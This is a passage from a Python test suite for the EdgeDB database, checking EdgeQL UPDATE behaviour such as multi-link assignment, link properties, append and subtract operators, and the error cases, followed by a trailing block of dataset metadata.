[{}, {}, {}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest.comment;
""",
['bad test'] * 3,
)
async def test_edgeql_update_multiple_01(self):
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
tags := (SELECT Tag)
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
tags: {
name
} ORDER BY .name
} FILTER UpdateTest.name = 'update-test1';
""",
[
{
'name': 'update-test1',
'tags': [{
'name': 'boring',
}, {
'name': 'fun',
}, {
'name': 'wow',
}],
},
]
)
async def test_edgeql_update_multiple_02(self):
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
tags := (SELECT Tag FILTER Tag.name = 'wow')
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
tags: {
name
} ORDER BY .name
} FILTER UpdateTest.name = 'update-test1';
""",
[
{
'name': 'update-test1',
'tags': [{
'name': 'wow',
}],
},
]
)
async def test_edgeql_update_multiple_03(self):
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
tags := (SELECT Tag FILTER Tag.name IN {'wow', 'fun'})
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
tags: {
name
} ORDER BY .name
} FILTER UpdateTest.name = 'update-test1';
""",
[
{
'name': 'update-test1',
'tags': [{
'name': 'fun',
}, {
'name': 'wow',
}],
},
]
)
async def test_edgeql_update_multiple_04(self):
await self.assert_query_result(
r"""
# first add a tag to UpdateTest
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
tags := (
SELECT Tag
FILTER Tag.name = 'fun'
)
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
tags: {
name
} ORDER BY .name
} FILTER UpdateTest.name = 'update-test1';
""",
[{
'name': 'update-test1',
'tags': [{
'name': 'fun',
}],
}],
)
await self.assert_query_result(
r"""
# now add another tag, but keep the existing one, too
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
tags := UpdateTest.tags UNION (
SELECT Tag
FILTER Tag.name = 'wow'
)
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
tags: {
name
} ORDER BY .name
} FILTER UpdateTest.name = 'update-test1';
""",
[{
'name': 'update-test1',
'tags': [{
'name': 'fun',
}, {
'name': 'wow',
}],
}],
)
async def test_edgeql_update_multiple_05(self):
await self.assert_query_result(
r"""
WITH
MODULE test,
U2 := UpdateTest
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
related := (SELECT U2 FILTER U2.name != 'update-test1')
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
related: {
name
} ORDER BY .name
} FILTER UpdateTest.name = 'update-test1';
""",
[
{
'name': 'update-test1',
'related': [{
'name': 'update-test2',
}, {
'name': 'update-test3',
}],
},
]
)
async def test_edgeql_update_multiple_06(self):
await self.assert_query_result(
r"""
WITH
MODULE test,
U2 := UpdateTest
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
annotated_tests := (
SELECT U2 FILTER U2.name != 'update-test1'
)
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
annotated_tests: {
name,
@note
} ORDER BY .name
} FILTER UpdateTest.name = 'update-test1';
""",
[
{
'name': 'update-test1',
'annotated_tests': [{
'name': 'update-test2',
'@note': None,
}, {
'name': 'update-test3',
'@note': None,
}],
},
]
)
async def test_edgeql_update_multiple_07(self):
await self.assert_query_result(
r"""
WITH
MODULE test,
U2 := UpdateTest
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
annotated_tests := (
SELECT U2 {
@note := 'note' ++ U2.name[-1]
} FILTER U2.name != 'update-test1'
)
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
annotated_tests: {
name,
@note
} ORDER BY .name
} FILTER UpdateTest.name = 'update-test1';
""",
[
{
'name': 'update-test1',
'annotated_tests': [{
'name': 'update-test2',
'@note': 'note2',
}, {
'name': 'update-test3',
'@note': 'note3',
}],
},
]
)
async def test_edgeql_update_multiple_08(self):
await self.con.execute("""
WITH MODULE test
INSERT UpdateTest {
name := 'update-test-8-1',
};
WITH MODULE test
INSERT UpdateTest {
name := 'update-test-8-2',
};
WITH MODULE test
INSERT UpdateTest {
name := 'update-test-8-3',
};
""")
await self.assert_query_result(
r"""
# make tests related to the other 2
WITH
MODULE test,
UT := (SELECT UpdateTest
FILTER .name LIKE 'update-test-8-%')
UPDATE UpdateTest
FILTER .name LIKE 'update-test-8-%'
SET {
related := (SELECT UT FILTER UT != UpdateTest)
};
""",
[
{'id': uuid.UUID},
{'id': uuid.UUID},
{'id': uuid.UUID},
],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest{
name,
related: {name} ORDER BY .name
}
FILTER .name LIKE 'update-test-8-%'
ORDER BY .name;
""",
[
{
'name': 'update-test-8-1',
'related': [
{'name': 'update-test-8-2'},
{'name': 'update-test-8-3'},
],
},
{
'name': 'update-test-8-2',
'related': [
{'name': 'update-test-8-1'},
{'name': 'update-test-8-3'},
],
},
{
'name': 'update-test-8-3',
'related': [
{'name': 'update-test-8-1'},
{'name': 'update-test-8-2'},
],
},
],
)
await self.assert_query_result(
r"""
# now update related tests based on existing related tests
WITH
MODULE test,
UT := (SELECT UpdateTest
FILTER .name LIKE 'update-test-8-%')
UPDATE UpdateTest
FILTER .name LIKE 'update-test-8-%'
SET {
# since there are 2 tests in each FILTER, != is
# guaranteed to be TRUE for at least one of them
related := (SELECT UT FILTER UT != UpdateTest.related)
};
""",
[
{'id': uuid.UUID},
{'id': uuid.UUID},
{'id': uuid.UUID},
],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest{
name,
related: {name} ORDER BY .name
}
FILTER .name LIKE 'update-test-8-%'
ORDER BY .name;
""",
[
{
'name': 'update-test-8-1',
'related': [
{'name': 'update-test-8-1'},
{'name': 'update-test-8-2'},
{'name': 'update-test-8-3'},
],
},
{
'name': 'update-test-8-2',
'related': [
{'name': 'update-test-8-1'},
{'name': 'update-test-8-2'},
{'name': 'update-test-8-3'},
],
},
{
'name': 'update-test-8-3',
'related': [
{'name': 'update-test-8-1'},
{'name': 'update-test-8-2'},
{'name': 'update-test-8-3'},
],
},
],
)
async def test_edgeql_update_multiple_09(self):
await self.con.execute("""
WITH MODULE test
INSERT UpdateTest {
name := 'update-test-9-1',
};
WITH MODULE test
INSERT UpdateTest {
name := 'update-test-9-2',
};
WITH MODULE test
INSERT UpdateTest {
name := 'update-test-9-3',
};
""")
await self.assert_query_result(
r"""
# make tests related to the other 2
WITH
MODULE test,
UT := (SELECT UpdateTest
FILTER .name LIKE 'update-test-9-%')
UPDATE UpdateTest
FILTER .name LIKE 'update-test-9-%'
SET {
related := (SELECT UT FILTER UT != UpdateTest)
};
""",
[
{'id': uuid.UUID},
{'id': uuid.UUID},
{'id': uuid.UUID},
],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest{
name,
related: {name} ORDER BY .name
}
FILTER .name LIKE 'update-test-9-%'
ORDER BY .name;
""",
[
{
'name': 'update-test-9-1',
'related': [
{'name': 'update-test-9-2'},
{'name': 'update-test-9-3'},
],
},
{
'name': 'update-test-9-2',
'related': [
{'name': 'update-test-9-1'},
{'name': 'update-test-9-3'},
],
},
{
'name': 'update-test-9-3',
'related': [
{'name': 'update-test-9-1'},
{'name': 'update-test-9-2'},
],
},
],
)
await self.assert_query_result(
r"""
# now update related tests based on existing related tests
WITH
MODULE test,
UT := (SELECT UpdateTest
FILTER .name LIKE 'update-test-9-%')
UPDATE UpdateTest
FILTER .name LIKE 'update-test-9-%'
SET {
# this should make the related test be the same as parent
related := (SELECT UT FILTER UT NOT IN UpdateTest.related)
};
""",
[
{'id': uuid.UUID},
{'id': uuid.UUID},
{'id': uuid.UUID},
],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest{
name,
related: {name} ORDER BY .name
}
FILTER .name LIKE 'update-test-9-%'
ORDER BY .name;
""",
[
{
'name': 'update-test-9-1',
'related': [
{'name': 'update-test-9-1'},
],
},
{
'name': 'update-test-9-2',
'related': [
{'name': 'update-test-9-2'},
],
},
{
'name': 'update-test-9-3',
'related': [
{'name': 'update-test-9-3'},
],
},
],
)
async def test_edgeql_update_multiple_10(self):
await self.con.execute("""
WITH MODULE test
INSERT UpdateTest {
name := 'update-test-10-1',
};
WITH MODULE test
INSERT UpdateTest {
name := 'update-test-10-2',
};
WITH MODULE test
INSERT UpdateTest {
name := 'update-test-10-3',
};
""")
await self.assert_query_result(
r"""
# make each test related to 'update-test-10-1'
WITH
MODULE test,
UT := (
SELECT UpdateTest FILTER .name = 'update-test-10-1'
)
UPDATE UpdateTest
FILTER .name LIKE 'update-test-10-%'
SET {
related := UT
};
""",
[
{'id': uuid.UUID},
{'id': uuid.UUID},
{'id': uuid.UUID},
],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest{
name,
related: {name} ORDER BY .name
}
FILTER .name LIKE 'update-test-10-%'
ORDER BY .name;
""",
[
{
'name': 'update-test-10-1',
'related': [
{'name': 'update-test-10-1'},
],
},
{
'name': 'update-test-10-2',
'related': [
{'name': 'update-test-10-1'},
],
},
{
'name': 'update-test-10-3',
'related': [
{'name': 'update-test-10-1'},
],
},
],
)
await self.assert_query_result(
r"""
# now update related tests
WITH MODULE test
# there's only one item in the UPDATE set
UPDATE UpdateTest.related
FILTER .name LIKE 'update-test-10-%'
SET {
# every test is .<related to 'update-test1'
related := UpdateTest.related.<related[IS UpdateTest]
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest{
name,
related: {name} ORDER BY .name
}
FILTER .name LIKE 'update-test-10-%'
ORDER BY .name;
""",
[
{
'name': 'update-test-10-1',
'related': [
{'name': 'update-test-10-1'},
{'name': 'update-test-10-2'},
{'name': 'update-test-10-3'},
],
},
{
'name': 'update-test-10-2',
'related': [
{'name': 'update-test-10-1'},
],
},
{
'name': 'update-test-10-3',
'related': [
{'name': 'update-test-10-1'},
],
},
],
)
async def test_edgeql_update_props_01(self):
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
weighted_tags := (
SELECT Tag {
@weight :=
1 IF Tag.name = 'boring' ELSE
2 IF Tag.name = 'wow' ELSE
3
}
)
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
weighted_tags: {
name,
@weight
} ORDER BY @weight
} FILTER UpdateTest.name = 'update-test1';
""",
[
{
'name': 'update-test1',
'weighted_tags': [{
'name': 'boring',
'@weight': 1,
}, {
'name': 'wow',
'@weight': 2,
}, {
'name': 'fun',
'@weight': 3,
}],
},
]
)
async def test_edgeql_update_props_02(self):
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
weighted_tags := (
SELECT Tag {@weight := 1} FILTER Tag.name = 'wow')
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
weighted_tags: {
name,
@weight
} ORDER BY @weight
} FILTER UpdateTest.name = 'update-test1';
""",
[
{
'name': 'update-test1',
'weighted_tags': [{
'name': 'wow',
'@weight': 1,
}],
},
]
)
async def test_edgeql_update_props_03(self):
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
weighted_tags := (
SELECT Tag {
@weight := len(Tag.name) % 2 + 1
} FILTER Tag.name IN {'wow', 'boring'}
)
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
weighted_tags: {
name,
@weight
} ORDER BY @weight
} FILTER UpdateTest.name = 'update-test1';
""",
[
{
'name': 'update-test1',
'weighted_tags': [{
'name': 'boring',
'@weight': 1,
}, {
'name': 'wow',
'@weight': 2,
}],
},
]
)
async def test_edgeql_update_props_05(self):
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
annotated_status := (
SELECT Status {
@note := 'Victor'
} FILTER Status.name = 'Closed'
)
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
annotated_status: {
name,
@note
}
} FILTER UpdateTest.name = 'update-test1';
""",
[
{
'name': 'update-test1',
'annotated_status': {
'name': 'Closed',
'@note': 'Victor',
},
},
]
)
async def test_edgeql_update_props_06(self):
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
annotated_status := (
SELECT Status {
@note := 'Victor'
} FILTER Status = UpdateTest.status
)
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
annotated_status: {
name,
@note
}
} FILTER UpdateTest.name = 'update-test1';
""",
[
{
'name': 'update-test1',
'annotated_status': {
'name': 'Open',
'@note': 'Victor',
},
},
]
)
async def test_edgeql_update_props_07(self):
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
annotated_status := (
SELECT Status FILTER Status.name = 'Open'
)
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
annotated_status: {
name,
@note
}
} FILTER UpdateTest.name = 'update-test1';
""",
[
{
'name': 'update-test1',
'annotated_status': {
'name': 'Open',
'@note': None,
},
},
]
)
async def test_edgeql_update_props_08(self):
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
annotated_status := (
SELECT Status {
@note := 'Victor'
} FILTER Status.name = 'Open'
)
};
""",
[{}],
)
await self.assert_query_result(
r"""
# update again, erasing the 'note' value
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
annotated_status: {
@note := <str>{}
}
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
annotated_status: {
name,
@note
}
} FILTER UpdateTest.name = 'update-test1';
""",
[
{
'name': 'update-test1',
'annotated_status': {
'name': 'Open',
'@note': None,
},
},
]
)
async def test_edgeql_update_for_01(self):
await self.assert_query_result(
r"""
WITH MODULE test
FOR x IN {
(name := 'update-test1', comment := 'foo'),
(name := 'update-test2', comment := 'bar')
}
UNION (
UPDATE UpdateTest
FILTER UpdateTest.name = x.name
SET {
comment := x.comment
}
);
""",
[{}, {}], # since updates are in FOR they return objects
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
comment
} ORDER BY UpdateTest.name;
""",
[
{
'name': 'update-test1',
'comment': 'foo'
},
{
'name': 'update-test2',
'comment': 'bar'
},
{
'name': 'update-test3',
'comment': 'third'
},
]
)
async def test_edgeql_update_empty_01(self):
await self.assert_query_result(
r"""
# just clear all the comments
WITH MODULE test
UPDATE UpdateTest
SET {
comment := {}
};
""",
[{}, {}, {}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest.comment;
""",
{},
)
async def test_edgeql_update_empty_02(self):
with self.assertRaisesRegex(
edgedb.InvalidPropertyTargetError,
r"invalid target for property.*std::int64.*expecting .*str'"):
await self.con.execute(r"""
# just clear all the comments
WITH MODULE test
UPDATE UpdateTest
SET {
comment := <int64>{}
};
""")
async def test_edgeql_update_empty_03(self):
with self.assertRaisesRegex(
edgedb.MissingRequiredError,
r"missing value for required property"):
await self.con.execute(r"""
# just clear all the comments
WITH MODULE test
UPDATE UpdateTest
SET {
name := {}
};
""")
async def test_edgeql_update_empty_04(self):
await self.assert_query_result(
r"""
# just clear all the statuses
WITH MODULE test
UPDATE UpdateTest
SET {
status := {}
};
""",
[{}, {}, {}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest.status;
""",
{},
)
async def test_edgeql_update_empty_05(self):
with self.assertRaisesRegex(
edgedb.InvalidLinkTargetError,
r"invalid target for link.*std::Object.*"
r"expecting 'test::Status'"):
await self.con.execute(r"""
# just clear all the statuses
WITH MODULE test
UPDATE UpdateTest
SET {
status := <Object>{}
};
""")
async def test_edgeql_update_cardinality_01(self):
with self.assertRaisesRegex(
edgedb.QueryError,
'single'):
await self.con.execute(r'''
SET MODULE test;
UPDATE UpdateTest
SET {
status := Status
};
''')
async def test_edgeql_update_cardinality_02(self):
await self.assert_query_result(r'''
WITH MODULE test
SELECT stdgraphql::Query {
multi x0 := (
WITH x1 := (
UPDATE UpdateTest
FILTER .name = 'update-test1'
SET {
status := (
SELECT Status
# the ID is non-existent
FILTER .id = <uuid>
'10000000-aaaa-bbbb-cccc-d00000000000'
)
}
)
SELECT x1 {
name,
status: {
name
}
}
)
};
''', [{
'x0': [{'name': 'update-test1', 'status': None}]
}])
async def test_edgeql_update_new_01(self):
# test and UPDATE with a new object
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER .name = 'update-test1'
SET {
tags := (
INSERT Tag {
name := 'new tag'
}
)
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
tags: {
name
}
} FILTER .name = 'update-test1';
""",
[
{
'name': 'update-test1',
'tags': [{
'name': 'new tag',
}],
},
]
)
async def test_edgeql_update_new_02(self):
# test and UPDATE with a new object
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER .name = 'update-test1'
SET {
status := (
INSERT Status {
name := 'new status'
}
)
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
status: {
name
}
} FILTER .name = 'update-test1';
""",
[
{
'name': 'update-test1',
'status': {
'name': 'new status',
},
},
]
)
async def test_edgeql_update_collection_01(self):
# test and UPDATE with a collection
await self.con.execute(
r"""
WITH MODULE test
UPDATE CollectionTest
FILTER .name = 'collection-test1'
SET {
some_tuple := ('coll_01', 1)
};
"""
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT CollectionTest {
name,
some_tuple,
} FILTER .name = 'collection-test1';
""",
[
{
'name': 'collection-test1',
'some_tuple': ['coll_01', 1],
},
]
)
async def test_edgeql_update_collection_02(self):
# test and UPDATE with a collection
await self.con.execute(
r"""
WITH MODULE test
UPDATE CollectionTest
FILTER .name = 'collection-test1'
SET {
str_array := ['coll_02', '2']
};
"""
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT CollectionTest {
name,
str_array,
} FILTER .name = 'collection-test1';
""",
[
{
'name': 'collection-test1',
'str_array': ['coll_02', '2'],
},
]
)
async def test_edgeql_update_in_conditional_bad_01(self):
with self.assertRaisesRegex(
edgedb.QueryError,
'UPDATE statements cannot be used'):
await self.con.execute(r'''
WITH MODULE test
SELECT
(SELECT UpdateTest)
??
(UPDATE UpdateTest SET { name := 'no way' });
''')
async def test_edgeql_update_in_conditional_bad_02(self):
with self.assertRaisesRegex(
edgedb.QueryError,
'UPDATE statements cannot be used'):
await self.con.execute(r'''
WITH MODULE test
SELECT
(SELECT UpdateTest FILTER .name = 'foo')
IF EXISTS UpdateTest
ELSE (
(SELECT UpdateTest)
UNION
(UPDATE UpdateTest SET { name := 'no way' })
);
''')
async def test_edgeql_update_correlated_bad_01(self):
with self.assertRaisesRegex(
edgedb.QueryError,
"cannot reference correlated set 'Status' here"):
await self.con.execute(r'''
WITH MODULE test
SELECT (
Status,
(UPDATE UpdateTest SET {
status := Status
})
);
''')
async def test_edgeql_update_correlated_bad_02(self):
with self.assertRaisesRegex(
edgedb.QueryError,
"cannot reference correlated set 'Status' here"):
await self.con.execute(r'''
WITH MODULE test
SELECT (
(UPDATE UpdateTest SET {
status := Status
}),
Status,
);
''')
async def test_edgeql_update_protect_readonly_01(self):
with self.assertRaisesRegex(
edgedb.QueryError,
"cannot update link 'readonly_tag': "
"it is declared as read-only",
_position=180,
):
await self.con.execute(r'''
WITH MODULE test
UPDATE UpdateTest
FILTER .name = 'update-test-readonly'
SET {
readonly_tag := (SELECT Tag FILTER .name = 'not read-only')
};
''')
async def test_edgeql_update_protect_readonly_02(self):
with self.assertRaisesRegex(
edgedb.QueryError,
"cannot update property 'readonly_note': "
"it is declared as read-only",
_position=181,
):
await self.con.execute(r'''
WITH MODULE test
UPDATE UpdateTest
FILTER .name = 'update-test-readonly'
SET {
readonly_note := 'not read-only',
};
''')
async def test_edgeql_update_protect_readonly_03(self):
with self.assertRaisesRegex(
edgedb.QueryError,
"cannot update property 'readonly_note': "
"it is declared as read-only",
_position=223,
):
await self.con.execute(r'''
WITH MODULE test
UPDATE UpdateTest
FILTER .name = 'update-test-readonly'
SET {
weighted_tags: {
@readonly_note := 'not read-only',
},
};
''')
async def test_edgeql_update_append_01(self):
await self.con.execute("""
WITH MODULE test
INSERT UpdateTest {
name := 'update-test-append-1',
};
WITH MODULE test
INSERT UpdateTest {
name := 'update-test-append-2',
};
WITH MODULE test
INSERT UpdateTest {
name := 'update-test-append-3',
};
""")
await self.con.execute("""
WITH
MODULE test,
U2 := UpdateTest
UPDATE UpdateTest
FILTER .name = 'update-test-append-1'
SET {
annotated_tests := (
SELECT U2 FILTER .name = 'update-test-append-2'
)
};
""")
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
annotated_tests: {
name,
@note
} ORDER BY .name
} FILTER UpdateTest.name = 'update-test-append-1';
""",
[
{
'name': 'update-test-append-1',
'annotated_tests': [{
'name': 'update-test-append-2',
'@note': None,
}],
},
]
)
await self.con.execute("""
WITH
MODULE test,
U2 := UpdateTest
UPDATE UpdateTest
FILTER .name = 'update-test-append-1'
SET {
annotated_tests += (
SELECT U2 { @note := 'foo' }
FILTER .name = 'update-test-append-3'
)
};
""")
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
annotated_tests: {
name,
@note
} ORDER BY .name
} FILTER UpdateTest.name = 'update-test-append-1';
""",
[
{
'name': 'update-test-append-1',
'annotated_tests': [{
'name': 'update-test-append-2',
'@note': None,
}, {
'name': 'update-test-append-3',
'@note': 'foo',
}],
},
]
)
async def test_edgeql_update_append_02(self):
with self.assertRaisesRegex(
edgedb.QueryError,
"possibly more than one element returned by an expression"
" for a computable link 'annotated_status' declared as 'single'",
_position=147,
):
await self.con.execute("""
WITH MODULE test
UPDATE UpdateTest
FILTER .name = 'foo'
SET {
annotated_status += (
SELECT Status FILTER .name = 'status'
)
};
""")
async def test_edgeql_append_badness_01(self):
with self.assertRaisesRegex(
edgedb.QueryError,
r"unexpected '\+='",
_position=123,
):
await self.con.execute("""
WITH MODULE test
INSERT UpdateTest
{
annotated_status += (
SELECT Status FILTER .name = 'status'
)
};
""")
async def test_edgeql_append_badness_02(self):
with self.assertRaisesRegex(
edgedb.QueryError,
r"unexpected '\+='",
_position=123,
):
await self.con.execute("""
WITH MODULE test
SELECT UpdateTest
{
annotated_status += (
SELECT Status FILTER .name = 'status'
)
};
""")
async def test_edgeql_update_subtract_01(self):
await self.con.execute("""
WITH MODULE test
INSERT UpdateTest {
name := 'update-test-subtract-1',
};
WITH MODULE test
INSERT UpdateTest {
name := 'update-test-subtract-2',
};
WITH MODULE test
INSERT UpdateTest {
name := 'update-test-subtract-3',
};
""")
await self.con.execute("""
WITH
MODULE test,
U2 := UpdateTest
UPDATE UpdateTest
FILTER .name = 'update-test-subtract-1'
SET {
annotated_tests := (
FOR v IN {
('update-test-subtract-2', 'one'),
('update-test-subtract-3', 'two'),
}
UNION (
SELECT U2 {
@note := v.1,
} FILTER .name = v.0
)
)
};
""")
await self.con.execute("""
WITH
MODULE test,
U2 := UpdateTest
UPDATE UpdateTest
FILTER .name = 'update-test-subtract-3'
SET {
annotated_tests := (
FOR v IN {
('update-test-subtract-2', 'one'),
}
UNION (
SELECT U2 {
@note := v.1,
} FILTER .name = v.0
)
)
};
""")
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
annotated_tests: {
name,
@note
} ORDER BY .name
} FILTER
.name LIKE 'update-test-subtract-%';
""",
[
{
'name': 'update-test-subtract-1',
'annotated_tests': [{
'name': 'update-test-subtract-2',
'@note': 'one',
}, {
'name': 'update-test-subtract-3',
'@note': 'two',
}],
},
{
'name': 'update-test-subtract-2',
'annotated_tests': [],
},
{
'name': 'update-test-subtract-3',
'annotated_tests': [{
'name': 'update-test-subtract-2',
'@note': 'one',
}],
},
]
)
await self.con.execute("""
WITH
MODULE test,
U2 := UpdateTest
UPDATE UpdateTest
FILTER .name = 'update-test-subtract-1'
SET {
annotated_tests -= (
SELECT U2
FILTER .name = 'update-test-subtract-2'
)
};
""")
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
annotated_tests: {
name,
@note
} ORDER BY .name
} FILTER
.name LIKE 'update-test-subtract-%';
""",
[
{
'name': 'update-test-subtract-1',
'annotated_tests': [{
'name': 'update-test-subtract-3',
'@note': 'two',
}],
},
{
'name': 'update-test-subtract-2',
'annotated_tests': [],
},
{
'name': 'update-test-subtract-3',
'annotated_tests': [{
'name': 'update-test-subtract-2',
'@note': 'one',
}],
},
]
)
async def test_edgeql_update_subtract_02(self):
await self.con.execute("""
WITH MODULE test
INSERT UpdateTest {
name := 'update-test-subtract-various',
annotated_status := (
SELECT Status {
@note := 'forever',
} FILTER .name = 'Closed'
),
comment := 'to remove',
str_tags := {'1', '2', '3'},
};
""")
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
annotated_status: {
name,
@note
},
comment,
str_tags ORDER BY UpdateTest.str_tags
} FILTER
.name = 'update-test-subtract-various';
""",
[
{
'annotated_status': {
'name': 'Closed',
'@note': 'forever',
},
'comment': 'to remove',
'str_tags': ['1', '2', '3'],
},
],
)
# Check that singleton links work.
await self.con.execute("""
WITH
MODULE test
UPDATE UpdateTest
FILTER .name = 'update-test-subtract-various'
SET {
annotated_status -= (SELECT Status FILTER .name = 'Closed')
};
""")
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
annotated_status: {
name,
@note
},
} FILTER
.name = 'update-test-subtract-various';
""",
[
{
'annotated_status': None,
},
],
)
# And singleton properties too.
await self.con.execute("""
WITH
MODULE test
UPDATE UpdateTest
FILTER .name = 'update-test-subtract-various'
SET {
comment -= 'to remove'
};
""")
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
comment,
} FILTER
.name = 'update-test-subtract-various';
""",
[
{
'comment': None,
},
],
)
# And multi properties as well.
await self.con.execute("""
WITH
MODULE test
UPDATE UpdateTest
FILTER .name = 'update-test-subtract-various'
SET {
str_tags -= '2'
};
""")
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
str_tags,
} FILTER
.name = 'update-test-subtract-various';
""",
[
{
'str_tags': {'1', '3'},
},
],
)
async def test_edgeql_subtract_badness_01(self):
with self.assertRaisesRegex(
edgedb.QueryError,
r"unexpected '-='",
_position=123,
):
await self.con.execute("""
WITH MODULE test
INSERT UpdateTest
{
annotated_status -= (
SELECT Status FILTER .name = 'status'
)
};
""")
async def test_edgeql_update_inheritance_01(self):
await self.con.execute('''
WITH MODULE test
INSERT UpdateTest {
name := 'update-test-inh-supertype-1',
related := (
SELECT (DETACHED UpdateTest)
FILTER .name = 'update-test1'
)
};
WITH MODULE test
INSERT UpdateTestSubType {
name := 'update-test-inh-subtype-1',
related := (
SELECT (DETACHED UpdateTest)
FILTER .name = 'update-test1'
)
};
''')
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER .name = 'update-test-inh-subtype-1'
SET {
comment := 'updated',
related := (
SELECT (DETACHED UpdateTest)
FILTER .name = 'update-test2'
),
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
comment,
related: {
name
}
}
FILTER .name LIKE 'update-test-inh-%'
ORDER BY .name
""",
[
{
'name': 'update-test-inh-subtype-1',
'comment': 'updated',
'related': [{
'name': 'update-test2'
}]
},
{
'name': 'update-test-inh-supertype-1',
'comment': None,
'related': [{
'name': 'update-test1'
}]
},
]
)
| 29.817582
| 79
| 0.34347
| 4,965
| 72,248
| 4.893656
| 0.068278
| 0.083549
| 0.076059
| 0.054328
| 0.87126
| 0.849817
| 0.802486
| 0.766556
| 0.740338
| 0.707783
| 0
| 0.018994
| 0.562036
| 72,248
| 2,422
| 80
| 29.829893
| 0.748878
| 0.014519
| 0
| 0.613083
| 0
| 0
| 0.349528
| 0.023293
| 0
| 0
| 0
| 0
| 0.071677
| 1
| 0.000696
| false
| 0
| 0.003479
| 0
| 0.006263
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8a493e90856ac13e2ee239bb98ebfc708f93762c
| 5,041
|
py
|
Python
|
tests/experiments_tests/test_evaluator.py
|
yuishihara/chainerrl
|
74901712a8ed8207b9d526d3f45b04bf22996b8d
|
[
"MIT"
] | 18
|
2018-08-07T07:27:41.000Z
|
2018-08-20T01:51:21.000Z
|
